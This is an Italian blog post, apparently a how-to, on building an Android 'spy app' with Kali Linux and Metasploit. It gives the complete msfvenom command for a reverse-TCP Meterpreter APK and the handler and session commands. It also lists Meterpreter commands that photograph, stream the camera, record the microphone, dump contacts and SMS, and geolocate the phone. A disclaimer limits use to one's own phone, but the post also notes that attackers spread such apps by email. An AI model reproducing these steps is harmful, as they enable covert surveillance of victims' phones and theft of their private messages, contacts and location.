!!! FLASH NEWS !!!

Come creare un’ App Spia per smartphone Android

Uno smartphone connesso è uno smartphone in pericolo. Per dimostrarlo vediamo come creare un'App Spia per smartphone Android e prendere pieno controllo di un cellulare utilizzando Kali Linux

App Spia per smartphone Android

Uno smartphone connesso è uno smartphone in pericolo. Si sente in continuazione parlare di telefonini spiati, messaggi monitorati e conversazioni registrate, ma è davvero così semplice prendere il pieno controllo di uno smartphone per spiare qualcuno a distanza?

Per dare finalmente una risposta a questa domanda, oggi voglio dimostrarti con quale semplicità un hacker può essere in grado di estorcere qualunque tipo di informazione da uno smartphone connesso in Rete, ma attento, ti avviso che quanto riportato di seguito ha puramente uno scopo informativo e metterlo in pratica su telefoni altrui costituisce reato ed è conseguentemente punibile dalla legge. Ti invito quindi a mettere in pratica quanto descritto in questo articolo unicamente su uno smartphone di tua proprietà. Detto questo possiamo iniziare.

Creare un’ App Spia per smartphone Android

Di cosa hai bisogno? Solamente di due cose: un PC equipaggiato con Kali Linux ed uno smartphone Android. Purtroppo io non ho ancora pubblicato una guida su come installare Kali Linux su PC quindi, se non hai ancora installato Kali Linux, puoi momentaneamente far riferimento a questa guida di Salvatore Aranzulla, magari non precisissima ed illustrata, ma comunque funzionale.

Una volta avviato Kali Linux, lancia il Terminale attraverso l’apposita icona in alto a sinistra e digita il comando msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=4444 R>app.apk seguito da Invio.

Sostituendo ad ip il tuo indirizzo IP locale. Otterrai in uscita il file app.apk che potrai trovare salvato nella cartella Home di Kali Linux.

creare un' App Spia per smartphone Android

creare un' App Spia per smartphone Android

creare un' App Spia per smartphone Android

Ora è arrivato il momento di trasferire l’App Spia per smartphone Android appena creata nello smartphone che hai scelto per questa prova. Per copiarla puoi connettere semplicemente lo smartphone al PC con un cavo USB. Una volta copiata, installala ed avviala.

Ovviamente in questo momento noi stiamo facendo solamente una prova, ma i veri pirati cercano di frodare le proprie vittime con altre tecniche, ad esempio attraverso e-mail di dubbia provenienza con la speranza che l’app venga cliccata ed installata.

Ora puoi tornare sul Terminale di Kali Linux e lanciare il comando msfconsole seguito da Invio. Una volta avviata la suite Metasploit prosegui digitando use multi/handler seguito da Invio e successivamente set payload android/meterpreter/reverse_tcp confermando sempre con Invio.

creare un' App Spia per smartphone Android

creare un' App Spia per smartphone Android

creare un' App Spia per smartphone Android

Adesso lancia il comando set LHOST ip dove ip è sempre il tuo indirizzo IP locale (quello utilizzato in precedenza), conferma con Invio, digita il comando set LPORT 4444 ed infine mettiti in “ascolto” con exploit.

Il terminale ti potrà sembrare bloccato ma non è così, premi ancora un volta Invio e lancia prima il comando session -I e successivamente session -1, apparirà a monitor la console di Meterpreter e lo smartphone sul quale è stata installata l’App Spia sarà ora sotto il tuo pieno controllo.

creare un' App Spia per smartphone Android

La console di Meterpreter mette a disposizione una serie di comandi che ti permettono di fare con lo smartphone sotto controllo un po’ quel che ti pare. Lancia ad esempio il comando webcams_snap per scattare una foto utilizzando la fotocamera del telefonino, webcam_stream per vedere ciò che inquadra o record_mic per attivare il microfono. Puoi addirittura rubare in un colpo solo tutta la rubrica o tutti gli SMS con dump_contacts e dump_sms. Per localizzare lo smartphone è sufficiente lanciare il comando geolocate.

E allora? Hai visto quanto poco ci vuole a creare un’ App Spia per smartphone Android e prendere il pieno controllo di un cellulare per spiare qualcuno a distanza?

Se vuoi rimanere aggiornato sugli ultimi articoli pubblicati iscriviti alla mia Newsletter (form sul fondo) o al mio Feed RSS.




TI E’ PIACIUTO L’ARTICOLO?

SE NON LO HAI GIÀ’ FATTO, AIUTAMI A CONDIVIDERLO CON I TUOI AMICI

TI BASTA UN PICCOLO CLICK 😉

Ti consiglio anche…

Rispondi

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

%d blogger hanno fatto clic su Mi Piace per questo: